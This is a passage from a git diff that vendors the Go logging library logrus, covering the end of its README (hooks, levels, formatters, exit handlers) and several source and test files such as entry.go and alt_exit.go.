+| [AzureTableHook](https://github.com/kpfaulkner/azuretablehook/) | Hook for logging to Azure Table Storage|
+| [Bugsnag](https://github.com/Shopify/logrus-bugsnag/blob/master/bugsnag.go) | Send errors to the Bugsnag exception tracking service. |
+| [DeferPanic](https://github.com/deferpanic/dp-logrus) | Hook for logging to DeferPanic |
+| [Discordrus](https://github.com/kz/discordrus) | Hook for logging to [Discord](https://discordapp.com/) |
+| [ElasticSearch](https://github.com/sohlich/elogrus) | Hook for logging to ElasticSearch|
+| [Firehose](https://github.com/beaubrewer/logrus_firehose) | Hook for logging to [Amazon Firehose](https://aws.amazon.com/kinesis/firehose/)
+| [Fluentd](https://github.com/evalphobia/logrus_fluent) | Hook for logging to fluentd |
+| [Go-Slack](https://github.com/multiplay/go-slack) | Hook for logging to [Slack](https://slack.com) |
+| [Graylog](https://github.com/gemnasium/logrus-graylog-hook) | Hook for logging to [Graylog](http://graylog2.org/) |
+| [Hiprus](https://github.com/nubo/hiprus) | Send errors to a channel in hipchat. |
+| [Honeybadger](https://github.com/agonzalezro/logrus_honeybadger) | Hook for sending exceptions to Honeybadger |
+| [InfluxDB](https://github.com/Abramovic/logrus_influxdb) | Hook for logging to influxdb |
+| [Influxus](http://github.com/vlad-doru/influxus) | Hook for concurrently logging to [InfluxDB](http://influxdata.com/) |
+| [Journalhook](https://github.com/wercker/journalhook) | Hook for logging to `systemd-journald` |
+| [KafkaLogrus](https://github.com/tracer0tong/kafkalogrus) | Hook for logging to Kafka |
+| [Kafka REST Proxy](https://github.com/Nordstrom/logrus-kafka-rest-proxy) | Hook for logging to [Kafka REST Proxy](https://docs.confluent.io/current/kafka-rest/docs) |
+| [LFShook](https://github.com/rifflock/lfshook) | Hook for logging to the local filesystem |
+| [Logbeat](https://github.com/macandmia/logbeat) | Hook for logging to [Opbeat](https://opbeat.com/) |
+| [Logentries](https://github.com/jcftang/logentriesrus) | Hook for logging to [Logentries](https://logentries.com/) |
+| [Logentrus](https://github.com/puddingfactory/logentrus) | Hook for logging to [Logentries](https://logentries.com/) |
+| [Logmatic.io](https://github.com/logmatic/logmatic-go) | Hook for logging to [Logmatic.io](http://logmatic.io/) |
+| [Logrusly](https://github.com/sebest/logrusly) | Send logs to [Loggly](https://www.loggly.com/) |
+| [Logstash](https://github.com/bshuster-repo/logrus-logstash-hook) | Hook for logging to [Logstash](https://www.elastic.co/products/logstash) |
+| [Mail](https://github.com/zbindenren/logrus_mail) | Hook for sending exceptions via mail |
+| [Mattermost](https://github.com/shuLhan/mattermost-integration/tree/master/hooks/logrus) | Hook for logging to [Mattermost](https://mattermost.com/) |
+| [Mongodb](https://github.com/weekface/mgorus) | Hook for logging to mongodb |
+| [NATS-Hook](https://github.com/rybit/nats_logrus_hook) | Hook for logging to [NATS](https://nats.io) |
+| [Octokit](https://github.com/dorajistyle/logrus-octokit-hook) | Hook for logging to github via octokit |
+| [Papertrail](https://github.com/polds/logrus-papertrail-hook) | Send errors to the [Papertrail](https://papertrailapp.com) hosted logging service via UDP. |
+| [PostgreSQL](https://github.com/gemnasium/logrus-postgresql-hook) | Send logs to [PostgreSQL](http://postgresql.org) |
+| [Promrus](https://github.com/weaveworks/promrus) | Expose number of log messages as [Prometheus](https://prometheus.io/) metrics |
+| [Pushover](https://github.com/toorop/logrus_pushover) | Send error via [Pushover](https://pushover.net) |
+| [Raygun](https://github.com/squirkle/logrus-raygun-hook) | Hook for logging to [Raygun.io](http://raygun.io/) |
+| [Redis-Hook](https://github.com/rogierlommers/logrus-redis-hook) | Hook for logging to a ELK stack (through Redis) |
+| [Rollrus](https://github.com/heroku/rollrus) | Hook for sending errors to rollbar |
+| [Scribe](https://github.com/sagar8192/logrus-scribe-hook) | Hook for logging to [Scribe](https://github.com/facebookarchive/scribe)|
+| [Sentry](https://github.com/evalphobia/logrus_sentry) | Send errors to the Sentry error logging and aggregation service. |
+| [Slackrus](https://github.com/johntdyer/slackrus) | Hook for Slack chat. |
+| [Stackdriver](https://github.com/knq/sdhook) | Hook for logging to [Google Stackdriver](https://cloud.google.com/logging/) |
+| [Sumorus](https://github.com/doublefree/sumorus) | Hook for logging to [SumoLogic](https://www.sumologic.com/)|
+| [Syslog](https://github.com/sirupsen/logrus/blob/master/hooks/syslog/syslog.go) | Send errors to remote syslog server. Uses standard library `log/syslog` behind the scenes. |
+| [Syslog TLS](https://github.com/shinji62/logrus-syslog-ng) | Send errors to remote syslog server with TLS support. |
+| [Telegram](https://github.com/rossmcdonald/telegram_hook) | Hook for logging errors to [Telegram](https://telegram.org/) |
+| [TraceView](https://github.com/evalphobia/logrus_appneta) | Hook for logging to [AppNeta TraceView](https://www.appneta.com/products/traceview/) |
+| [Typetalk](https://github.com/dragon3/logrus-typetalk-hook) | Hook for logging to [Typetalk](https://www.typetalk.in/) |
+| [logz.io](https://github.com/ripcurld00d/logrus-logzio-hook) | Hook for logging to [logz.io](https://logz.io), a Log as a Service using Logstash |
+| [SQS-Hook](https://github.com/tsarpaul/logrus_sqs) | Hook for logging to [Amazon Simple Queue Service (SQS)](https://aws.amazon.com/sqs/) |
+
+#### Level logging
+
+Logrus has six logging levels: Debug, Info, Warning, Error, Fatal and Panic.
+
+```go
+log.Debug("Useful debugging information.")
+log.Info("Something noteworthy happened!")
+log.Warn("You should probably take a look at this.")
+log.Error("Something failed but I'm not quitting.")
+// Calls os.Exit(1) after logging
+log.Fatal("Bye.")
+// Calls panic() after logging
+log.Panic("I'm bailing.")
+```
+
+You can set the logging level on a `Logger`, then it will only log entries with
+that severity or anything above it:
+
+```go
+// Will log anything that is info or above (warn, error, fatal, panic). Default.
+log.SetLevel(log.InfoLevel)
+```
+
+It may be useful to set `log.Level = logrus.DebugLevel` in a debug or verbose
+environment if your application has that.
+
+#### Entries
+
+Besides the fields added with `WithField` or `WithFields` some fields are
+automatically added to all logging events:
+
+1. `time`. The timestamp when the entry was created.
+2. `msg`. The logging message passed to `{Info,Warn,Error,Fatal,Panic}` after
+   the `AddFields` call. E.g. `Failed to send event.`
+3. `level`. The logging level. E.g. `info`.
+
+#### Environments
+
+Logrus has no notion of environment.
+
+If you wish for hooks and formatters to only be used in specific environments,
+you should handle that yourself. For example, if your application has a global
+variable `Environment`, which is a string representation of the environment you
+could do:
+
+```go
+import (
+  log "github.com/sirupsen/logrus"
+)
+
+init() {
+  // do something here to set environment depending on an environment variable
+  // or command-line flag
+  if Environment == "production" {
+    log.SetFormatter(&log.JSONFormatter{})
+  } else {
+    // The TextFormatter is default, you don't actually have to do this.
+    log.SetFormatter(&log.TextFormatter{})
+  }
+}
+```
+
+This configuration is how `logrus` was intended to be used, but JSON in
+production is mostly only useful if you do log aggregation with tools like
+Splunk or Logstash.
+
+#### Formatters
+
+The built-in logging formatters are:
+
+* `logrus.TextFormatter`. Logs the event in colors if stdout is a tty, otherwise
+  without colors.
+  * *Note:* to force colored output when there is no TTY, set the `ForceColors`
+    field to `true`.  To force no colored output even if there is a TTY  set the
+    `DisableColors` field to `true`. For Windows, see
+    [github.com/mattn/go-colorable](https://github.com/mattn/go-colorable).
+  * All options are listed in the [generated docs](https://godoc.org/github.com/sirupsen/logrus#TextFormatter).
+* `logrus.JSONFormatter`. Logs fields as JSON.
+  * All options are listed in the [generated docs](https://godoc.org/github.com/sirupsen/logrus#JSONFormatter).
+
+Third party logging formatters:
+
+* [`FluentdFormatter`](https://github.com/joonix/log). Formats entries that can be parsed by Kubernetes and Google Container Engine.
+* [`logstash`](https://github.com/bshuster-repo/logrus-logstash-hook). Logs fields as [Logstash](http://logstash.net) Events.
+* [`prefixed`](https://github.com/x-cray/logrus-prefixed-formatter). Displays log entry source along with alternative layout.
+* [`zalgo`](https://github.com/aybabtme/logzalgo). Invoking the P͉̫o̳̼̊w̖͈̰͎e̬͔̭͂r͚̼̹̲ ̫͓͉̳͈ō̠͕͖̚f̝͍̠ ͕̲̞͖͑Z̖̫̤̫ͪa͉̬͈̗l͖͎g̳̥o̰̥̅!̣͔̲̻͊̄ ̙̘̦̹̦.
+
+You can define your formatter by implementing the `Formatter` interface,
+requiring a `Format` method. `Format` takes an `*Entry`. `entry.Data` is a
+`Fields` type (`map[string]interface{}`) with all your fields as well as the
+default ones (see Entries section above):
+
+```go
+type MyJSONFormatter struct {
+}
+
+log.SetFormatter(new(MyJSONFormatter))
+
+func (f *MyJSONFormatter) Format(entry *Entry) ([]byte, error) {
+  // Note this doesn't include Time, Level and Message which are available on
+  // the Entry. Consult `godoc` on information about those fields or read the
+  // source of the official loggers.
+  serialized, err := json.Marshal(entry.Data)
+    if err != nil {
+      return nil, fmt.Errorf("Failed to marshal fields to JSON, %v", err)
+    }
+  return append(serialized, '\n'), nil
+}
+```
+
+#### Logger as an `io.Writer`
+
+Logrus can be transformed into an `io.Writer`. That writer is the end of an `io.Pipe` and it is your responsibility to close it.
+
+```go
+w := logger.Writer()
+defer w.Close()
+
+srv := http.Server{
+    // create a stdlib log.Logger that writes to
+    // logrus.Logger.
+    ErrorLog: log.New(w, "", 0),
+}
+```
+
+Each line written to that writer will be printed the usual way, using formatters
+and hooks. The level for those entries is `info`.
+
+This means that we can override the standard library logger easily:
+
+```go
+logger := logrus.New()
+logger.Formatter = &logrus.JSONFormatter{}
+
+// Use logrus for standard log output
+// Note that `log` here references stdlib's log
+// Not logrus imported under the name `log`.
+log.SetOutput(logger.Writer())
+```
+
+#### Rotation
+
+Log rotation is not provided with Logrus. Log rotation should be done by an
+external program (like `logrotate(8)`) that can compress and delete old log
+entries. It should not be a feature of the application-level logger.
+
+#### Tools
+
+| Tool | Description |
+| ---- | ----------- |
+|[Logrus Mate](https://github.com/gogap/logrus_mate)|Logrus mate is a tool for Logrus to manage loggers, you can initial logger's level, hook and formatter by config file, the logger will generated with different config at different environment.|
+|[Logrus Viper Helper](https://github.com/heirko/go-contrib/tree/master/logrusHelper)|An Helper around Logrus to wrap with spf13/Viper to load configuration with fangs! And to simplify Logrus configuration use some behavior of [Logrus Mate](https://github.com/gogap/logrus_mate). [sample](https://github.com/heirko/iris-contrib/blob/master/middleware/logrus-logger/example) |
+
+#### Testing
+
+Logrus has a built in facility for asserting the presence of log messages. This is implemented through the `test` hook and provides:
+
+* decorators for existing logger (`test.NewLocal` and `test.NewGlobal`) which basically just add the `test` hook
+* a test logger (`test.NewNullLogger`) that just records log messages (and does not output any):
+
+```go
+import(
+  "github.com/sirupsen/logrus"
+  "github.com/sirupsen/logrus/hooks/test"
+  "github.com/stretchr/testify/assert"
+  "testing"
+)
+
+func TestSomething(t*testing.T){
+  logger, hook := test.NewNullLogger()
+  logger.Error("Helloerror")
+
+  assert.Equal(t, 1, len(hook.Entries))
+  assert.Equal(t, logrus.ErrorLevel, hook.LastEntry().Level)
+  assert.Equal(t, "Helloerror", hook.LastEntry().Message)
+
+  hook.Reset()
+  assert.Nil(t, hook.LastEntry())
+}
+```
+
+#### Fatal handlers
+
+Logrus can register one or more functions that will be called when any `fatal`
+level message is logged. The registered handlers will be executed before
+logrus performs a `os.Exit(1)`. This behavior may be helpful if callers need
+to gracefully shutdown. Unlike a `panic("Something went wrong...")` call which can be intercepted with a deferred `recover` a call to `os.Exit(1)` can not be intercepted.
+
+```
+...
+handler := func() {
+  // gracefully shutdown something...
+}
+logrus.RegisterExitHandler(handler)
+...
+```
+
+#### Thread safety
+
+By default Logger is protected by mutex for concurrent writes, this mutex is invoked when calling hooks and writing logs.
+If you are sure such locking is not needed, you can call logger.SetNoLock() to disable the locking.
+
+Situation when locking is not needed includes:
+
+* You have no hooks registered, or hooks calling is already thread-safe.
+
+* Writing to logger.Out is already thread-safe, for example:
+
+  1) logger.Out is protected by locks.
+
+  2) logger.Out is a os.File handler opened with `O_APPEND` flag, and every write is smaller than 4k. (This allow multi-thread/multi-process writing)
+
+     (Refer to http://www.notthewizard.com/2014/06/17/are-files-appends-really-atomic/)
diff --git a/vendor/github.com/Sirupsen/logrus/alt_exit.go b/vendor/github.com/Sirupsen/logrus/alt_exit.go
new file mode 100644
index 0000000000..8af90637a9
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/alt_exit.go
@@ -0,0 +1,64 @@
+package logrus
+
+// The following code was sourced and modified from the
+// https://github.com/tebeka/atexit package governed by the following license:
+//
+// Copyright (c) 2012 Miki Tebeka <miki.tebeka@gmail.com>.
+//
+// Permission is hereby granted, free of charge, to any person obtaining a copy of
+// this software and associated documentation files (the "Software"), to deal in
+// the Software without restriction, including without limitation the rights to
+// use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
+// the Software, and to permit persons to whom the Software is furnished to do so,
+// subject to the following conditions:
+//
+// The above copyright notice and this permission notice shall be included in all
+// copies or substantial portions of the Software.
+//
+// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
+// FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
+// COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
+// IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
+// CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+import (
+	"fmt"
+	"os"
+)
+
+var handlers = []func(){}
+
+func runHandler(handler func()) {
+	defer func() {
+		if err := recover(); err != nil {
+			fmt.Fprintln(os.Stderr, "Error: Logrus exit handler error:", err)
+		}
+	}()
+
+	handler()
+}
+
+func runHandlers() {
+	for _, handler := range handlers {
+		runHandler(handler)
+	}
+}
+
+// Exit runs all the Logrus atexit handlers and then terminates the program using os.Exit(code)
+func Exit(code int) {
+	runHandlers()
+	os.Exit(code)
+}
+
+// RegisterExitHandler adds a Logrus Exit handler, call logrus.Exit to invoke
+// all handlers. The handlers will also be invoked when any Fatal log entry is
+// made.
+//
+// This method is useful when a caller wishes to use logrus to log a fatal
+// message but also needs to gracefully shutdown. An example usecase could be
+// closing database connections, or sending a alert that the application is
+// closing.
+func RegisterExitHandler(handler func()) {
+	handlers = append(handlers, handler)
+}
diff --git a/vendor/github.com/Sirupsen/logrus/alt_exit_test.go b/vendor/github.com/Sirupsen/logrus/alt_exit_test.go
new file mode 100644
index 0000000000..a08b1a898f
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/alt_exit_test.go
@@ -0,0 +1,83 @@
+package logrus
+
+import (
+	"io/ioutil"
+	"log"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"testing"
+	"time"
+)
+
+func TestRegister(t *testing.T) {
+	current := len(handlers)
+	RegisterExitHandler(func() {})
+	if len(handlers) != current+1 {
+		t.Fatalf("expected %d handlers, got %d", current+1, len(handlers))
+	}
+}
+
+func TestHandler(t *testing.T) {
+	tempDir, err := ioutil.TempDir("", "test_handler")
+	if err != nil {
+		log.Fatalf("can't create temp dir. %q", err)
+	}
+	defer os.RemoveAll(tempDir)
+
+	gofile := filepath.Join(tempDir, "gofile.go")
+	if err := ioutil.WriteFile(gofile, testprog, 0666); err != nil {
+		t.Fatalf("can't create go file. %q", err)
+	}
+
+	outfile := filepath.Join(tempDir, "outfile.out")
+	arg := time.Now().UTC().String()
+	err = exec.Command("go", "run", gofile, outfile, arg).Run()
+	if err == nil {
+		t.Fatalf("completed normally, should have failed")
+	}
+
+	data, err := ioutil.ReadFile(outfile)
+	if err != nil {
+		t.Fatalf("can't read output file %s. %q", outfile, err)
+	}
+
+	if string(data) != arg {
+		t.Fatalf("bad data. Expected %q, got %q", data, arg)
+	}
+}
+
+var testprog = []byte(`
+// Test program for atexit, gets output file and data as arguments and writes
+// data to output file in atexit handler.
+package main
+
+import (
+	"github.com/sirupsen/logrus"
+	"flag"
+	"fmt"
+	"io/ioutil"
+)
+
+var outfile = ""
+var data = ""
+
+func handler() {
+	ioutil.WriteFile(outfile, []byte(data), 0666)
+}
+
+func badHandler() {
+	n := 0
+	fmt.Println(1/n)
+}
+
+func main() {
+	flag.Parse()
+	outfile = flag.Arg(0)
+	data = flag.Arg(1)
+
+	logrus.RegisterExitHandler(handler)
+	logrus.RegisterExitHandler(badHandler)
+	logrus.Fatal("Bye bye")
+}
+`)
diff --git a/vendor/github.com/Sirupsen/logrus/appveyor.yml b/vendor/github.com/Sirupsen/logrus/appveyor.yml
new file mode 100644
index 0000000000..96c2ce15f8
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/appveyor.yml
@@ -0,0 +1,14 @@
+version: "{build}"
+platform: x64
+clone_folder: c:\gopath\src\github.com\sirupsen\logrus
+environment:  
+  GOPATH: c:\gopath
+branches:  
+  only:
+    - master
+install:  
+  - set PATH=%GOPATH%\bin;c:\go\bin;%PATH%
+  - go version
+build_script:  
+  - go get -t
+  - go test
diff --git a/vendor/github.com/Sirupsen/logrus/doc.go b/vendor/github.com/Sirupsen/logrus/doc.go
new file mode 100644
index 0000000000..da67aba06d
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/doc.go
@@ -0,0 +1,26 @@
+/*
+Package logrus is a structured logger for Go, completely API compatible with the standard library logger.
+
+
+The simplest way to use Logrus is simply the package-level exported logger:
+
+  package main
+
+  import (
+    log "github.com/sirupsen/logrus"
+  )
+
+  func main() {
+    log.WithFields(log.Fields{
+      "animal": "walrus",
+      "number": 1,
+      "size":   10,
+    }).Info("A walrus appears")
+  }
+
+Output:
+  time="2015-09-07T08:48:33Z" level=info msg="A walrus appears" animal=walrus number=1 size=10
+
+For a full guide visit https://github.com/sirupsen/logrus
+*/
+package logrus
diff --git a/vendor/github.com/Sirupsen/logrus/entry.go b/vendor/github.com/Sirupsen/logrus/entry.go
new file mode 100644
index 0000000000..778f4c9f0d
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/entry.go
@@ -0,0 +1,288 @@
+package logrus
+
+import (
+	"bytes"
+	"fmt"
+	"os"
+	"sync"
+	"time"
+)
+
+var bufferPool *sync.Pool
+
+func init() {
+	bufferPool = &sync.Pool{
+		New: func() interface{} {
+			return new(bytes.Buffer)
+		},
+	}
+}
+
+// Defines the key when adding errors using WithError.
+var ErrorKey = "error"
+
+// An entry is the final or intermediate Logrus logging entry. It contains all
+// the fields passed with WithField{,s}. It's finally logged when Debug, Info,
+// Warn, Error, Fatal or Panic is called on it. These objects can be reused and
+// passed around as much as you wish to avoid field duplication.
+type Entry struct {
+	Logger *Logger
+
+	// Contains all the fields set by the user.
+	Data Fields
+
+	// Time at which the log entry was created
+	Time time.Time
+
+	// Level the log entry was logged at: Debug, Info, Warn, Error, Fatal or Panic
+	// This field will be set on entry firing and the value will be equal to the one in Logger struct field.
+	Level Level
+
+	// Message passed to Debug, Info, Warn, Error, Fatal or Panic
+	Message string
+
+	// When formatter is called in entry.log(), an Buffer may be set to entry
+	Buffer *bytes.Buffer
+}
+
+func NewEntry(logger *Logger) *Entry {
+	return &Entry{
+		Logger: logger,
+		// Default is three fields, give a little extra room
+		Data: make(Fields, 5),
+	}
+}
+
+// Returns the string representation from the reader and ultimately the
+// formatter.
+func (entry *Entry) String() (string, error) {
+	serialized, err := entry.Logger.Formatter.Format(entry)
+	if err != nil {
+		return "", err
+	}
+	str := string(serialized)
+	return str, nil
+}
+
+// Add an error as single field (using the key defined in ErrorKey) to the Entry.
+func (entry *Entry) WithError(err error) *Entry {
+	return entry.WithField(ErrorKey, err)
+}
+
+// Add a single field to the Entry.
+func (entry *Entry) WithField(key string, value interface{}) *Entry {
+	return entry.WithFields(Fields{key: value})
+}
+
+// Add a map of fields to the Entry.
+func (entry *Entry) WithFields(fields Fields) *Entry {
+	data := make(Fields, len(entry.Data)+len(fields))
+	for k, v := range entry.Data {
+		data[k] = v
+	}
+	for k, v := range fields {
+		data[k] = v
+	}
+	return &Entry{Logger: entry.Logger, Data: data}
+}
+
+// This function is not declared with a pointer value because otherwise
+// race conditions will occur when using multiple goroutines
+func (entry Entry) log(level Level, msg string) {
+	var buffer *bytes.Buffer
+	entry.Time = time.Now()
+	entry.Level = level
+	entry.Message = msg
+
+	entry.fireHooks()
+
+	buffer = bufferPool.Get().(*bytes.Buffer)
+	buffer.Reset()
+	defer bufferPool.Put(buffer)
+	entry.Buffer = buffer
+
+	entry.write()
+
+	entry.Buffer = nil
+
+	// To avoid Entry#log() returning a value that only would make sense for
+	// panic() to use in Entry#Panic(), we avoid the allocation by checking
+	// directly here.
+	if level <= PanicLevel {
+		panic(&entry)
+	}
+}
+
+// This function is not declared with a pointer value because otherwise
+// race conditions will occur when using multiple goroutines
+func (entry Entry) fireHooks() {
+	entry.Logger.mu.Lock()
+	defer entry.Logger.mu.Unlock()
+	err := entry.Logger.Hooks.Fire(entry.Level, &entry)
+	if err != nil {
+		fmt.Fprintf(os.Stderr, "Failed to fire hook: %v\n", err)
+	}
+}
+
+func (entry *Entry) write() {
+	serialized, err := entry.Logger.Formatter.Format(entry)
+	entry.Logger.mu.Lock()
+	defer entry.Logger.mu.Unlock()
+	if err != nil {
+		fmt.Fprintf(os.Stderr, "Failed to obtain reader, %v\n", err)
+	} else {
+		_, err = entry.Logger.Out.Write(serialized)
+		if err != nil {
+			fmt.Fprintf(os.Stderr, "Failed to write to log, %v\n", err)
+		}
+	}
+}
+
+func (entry *Entry) Debug(args ...interface{}) {
+	if entry.Logger.level() >= DebugLevel {
+		entry.log(DebugLevel, fmt.Sprint(args...))
+	}
+}
+
+func (entry *Entry) Print(args ...interface{}) {
+	entry.Info(args...)
+}
+
+func (entry *Entry) Info(args ...interface{}) {
+	if entry.Logger.level() >= InfoLevel {
+		entry.log(InfoLevel, fmt.Sprint(args...))
+	}
+}
+
+func (entry *Entry) Warn(args ...interface{}) {
+	if entry.Logger.level() >= WarnLevel {
+		entry.log(WarnLevel, fmt.Sprint(args...))
+	}
+}
+
+func (entry *Entry) Warning(args ...interface{}) {
+	entry.Warn(args...)
+}
+
+func (entry *Entry) Error(args ...interface{}) {
+	if entry.Logger.level() >= ErrorLevel {
+		entry.log(ErrorLevel, fmt.Sprint(args...))
+	}
+}
+
+func (entry *Entry) Fatal(args ...interface{}) {
+	if entry.Logger.level() >= FatalLevel {
+		entry.log(FatalLevel, fmt.Sprint(args...))
+	}
+	Exit(1)
+}
+
+func (entry *Entry) Panic(args ...interface{}) {
+	if entry.Logger.level() >= PanicLevel {
+		entry.log(PanicLevel, fmt.Sprint(args...))
+	}
+	panic(fmt.Sprint(args...))
+}
+
+// Entry Printf family functions
+
+func (entry *Entry) Debugf(format string, args ...interface{}) {
+	if entry.Logger.level() >= DebugLevel {
+		entry.Debug(fmt.Sprintf(format, args...))
+	}
+}
+
+func (entry *Entry) Infof(format string, args ...interface{}) {
+	if entry.Logger.level() >= InfoLevel {
+		entry.Info(fmt.Sprintf(format, args...))
+	}
+}
+
+func (entry *Entry) Printf(format string, args ...interface{}) {
+	entry.Infof(format, args...)
+}
+
+func (entry *Entry) Warnf(format string, args ...interface{}) {
+	if entry.Logger.level() >= WarnLevel {
+		entry.Warn(fmt.Sprintf(format, args...))
+	}
+}
+
+func (entry *Entry) Warningf(format string, args ...interface{}) {
+	entry.Warnf(format, args...)
+}
+
+func (entry *Entry) Errorf(format string, args ...interface{}) {
+	if entry.Logger.level() >= ErrorLevel {
+		entry.Error(fmt.Sprintf(format, args...))
+	}
+}
+
+func (entry *Entry) Fatalf(format string, args ...interface{}) {
+	if entry.Logger.level() >= FatalLevel {
+		entry.Fatal(fmt.Sprintf(format, args...))
+	}
+	Exit(1)
+}
+
+func (entry *Entry) Panicf(format string, args ...interface{}) {
+	if entry.Logger.level() >= PanicLevel {
+		entry.Panic(fmt.Sprintf(format, args...))
+	}
+}
+
+// Entry Println family functions
+
+func (entry *Entry) Debugln(args ...interface{}) {
+	if entry.Logger.level() >= DebugLevel {
+		entry.Debug(entry.sprintlnn(args...))
+	}
+}
+
+func (entry *Entry) Infoln(args ...interface{}) {
+	if entry.Logger.level() >= InfoLevel {
+		entry.Info(entry.sprintlnn(args...))
+	}
+}
+
+func (entry *Entry) Println(args ...interface{}) {
+	entry.Infoln(args...)
+}
+
+func (entry *Entry) Warnln(args ...interface{}) {
+	if entry.Logger.level() >= WarnLevel {
+		entry.Warn(entry.sprintlnn(args...))
+	}
+}
+
+func (entry *Entry) Warningln(args ...interface{}) {
+	entry.Warnln(args...)
+}
+
+func (entry *Entry) Errorln(args ...interface{}) {
+	if entry.Logger.level() >= ErrorLevel {
+		entry.Error(entry.sprintlnn(args...))
+	}
+}
+
+func (entry *Entry) Fatalln(args ...interface{}) {
+	if entry.Logger.level() >= FatalLevel {
+		entry.Fatal(entry.sprintlnn(args...))
+	}
+	Exit(1)
+}
+
+func (entry *Entry) Panicln(args ...interface{}) {
+	if entry.Logger.level() >= PanicLevel {
+		entry.Panic(entry.sprintlnn(args...))
+	}
+}
+
+// Sprintlnn => Sprint no newline. This is to get the behavior of how
+// fmt.Sprintln where spaces are always added between operands, regardless of
+// their type. Instead of vendoring the Sprintln implementation to spare a
+// string allocation, we do the simplest thing.
+func (entry *Entry) sprintlnn(args ...interface{}) string {
+	msg := fmt.Sprintln(args...)
+	return msg[:len(msg)-1]
+}
diff --git a/vendor/github.com/Sirupsen/logrus/entry_test.go b/vendor/github.com/Sirupsen/logrus/entry_test.go
new file mode 100644
index 0000000000..a81e2b3834
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/entry_test.go
@@ -0,0 +1,115 @@
+package logrus
+
+import (
+	"bytes"
+	"fmt"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+func TestEntryWithError(t *testing.T) {
+
+	assert := assert.New(t)
+
+	defer func() {
+		ErrorKey = "error"
+	}()
+
+	err := fmt.Errorf("kaboom at layer %d", 4711)
+
+	assert.Equal(err, WithError(err).Data["error"])
+
+	logger := New()
+	logger.Out = &bytes.Buffer{}
+	entry := NewEntry(logger)
+
+	assert.Equal(err, entry.WithError(err).Data["error"])
+
+	ErrorKey = "err"
+
+	assert.Equal(err, entry.WithError(err).Data["err"])
+
+}
+
+func TestEntryPanicln(t *testing.T) {
+	errBoom := fmt.Errorf("boom time")
+
+	defer func() {
+		p := recover()
+		assert.NotNil(t, p)
+
+		switch pVal := p.(type) {
+		case *Entry:
+			assert.Equal(t, "kaboom", pVal.Message)
+			assert.Equal(t, errBoom, pVal.Data["err"])
+		default:
+			t.Fatalf("want type *Entry, got %T: %#v", pVal, pVal)
+		}
+	}()
+
+	logger := New()
+	logger.Out = &bytes.Buffer{}
+	entry := NewEntry(logger)
+	entry.WithField("err", errBoom).Panicln("kaboom")
+}
+
+func TestEntryPanicf(t *testing.T) {
+	errBoom := fmt.Errorf("boom again")
+
+	defer func() {
+		p := recover()
+		assert.NotNil(t, p)
+
+		switch pVal := p.(type) {
+		case *Entry:
+			assert.Equal(t, "kaboom true", pVal.Message)
+			assert.Equal(t, errBoom, pVal.Data["err"])
+		default:
+			t.Fatalf("want type *Entry, got %T: %#v", pVal, pVal)
+		}
+	}()
+
+	logger := New()
+	logger.Out = &bytes.Buffer{}
+	entry := NewEntry(logger)
+	entry.WithField("err", errBoom).Panicf("kaboom %v", true)
+}
+
+const (
+	badMessage   = "this is going to panic"
+	panicMessage = "this is broken"
+)
+
+type panickyHook struct{}
+
+func (p *panickyHook) Levels() []Level {
+	return []Level{InfoLevel}
+}
+
+func (p *panickyHook) Fire(entry *Entry) error {
+	if entry.Message == badMessage {
+		panic(panicMessage)
+	}
+
+	return nil
+}
+
+func TestEntryHooksPanic(t *testing.T) {
+	logger := New()
+	logger.Out = &bytes.Buffer{}
+	logger.Level = InfoLevel
+	logger.Hooks.Add(&panickyHook{})
+
+	defer func() {
+		p := recover()
+		assert.NotNil(t, p)
+		assert.Equal(t, panicMessage, p)
+
+		entry := NewEntry(logger)
+		entry.Info("another message")
+	}()
+
+	entry := NewEntry(logger)
+	entry.Info(badMessage)
+}
diff --git a/vendor/github.com/Sirupsen/logrus/example_basic_test.go b/vendor/github.com/Sirupsen/logrus/example_basic_test.go
new file mode 100644
index 0000000000..a2acf550c9
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/example_basic_test.go
@@ -0,0 +1,69 @@
+package logrus_test
+
+import (
+	"github.com/sirupsen/logrus"
+	"os"
+)
+
+func Example_basic() {
+	var log = logrus.New()
+	log.Formatter = new(logrus.JSONFormatter)
+	log.Formatter = new(logrus.TextFormatter)                     //default
+	log.Formatter.(*logrus.TextFormatter).DisableTimestamp = true // remove timestamp from test output
+	log.Level = logrus.DebugLevel
+	log.Out = os.Stdout
+
+	// file, err := os.OpenFile("logrus.log", os.O_CREATE|os.O_WRONLY, 0666)
+	// if err == nil {
+	// 	log.Out = file
+	// } else {
+	// 	log.Info("Failed to log to file, using default stderr")
+	// }
+
+	defer func() {
+		err := recover()
+		if err != nil {
+			entry := err.(*logrus.Entry)
+			log.WithFields(logrus.Fields{
+				"omg":         true,
+				"err_animal":  entry.Data["animal"],
+				"err_size":    entry.Data["size"],
+				"err_level":   entry.Level,
+				"err_message": entry.Message,
+				"number":      100,
+			}).Error("The ice breaks!") // or use Fatal() to force the process to exit with a nonzero code
+		}
+	}()
+
+	log.WithFields(logrus.Fields{
+		"animal": "walrus",
+		"number": 8,
+	}).Debug("Started observing beach")
+
+	log.WithFields(logrus.Fields{
+		"animal": "walrus",
+		"size":   10,
+	}).Info("A group of walrus emerges from the ocean")
+
+	log.WithFields(logrus.Fields{
+		"omg":    true,
+		"number": 122,
+	}).Warn("The group's number increased tremendously!")
+
+	log.WithFields(logrus.Fields{
+		"temperature": -4,
+	}).Debug("Temperature changes")
+
+	log.WithFields(logrus.Fields{
+		"animal": "orca",
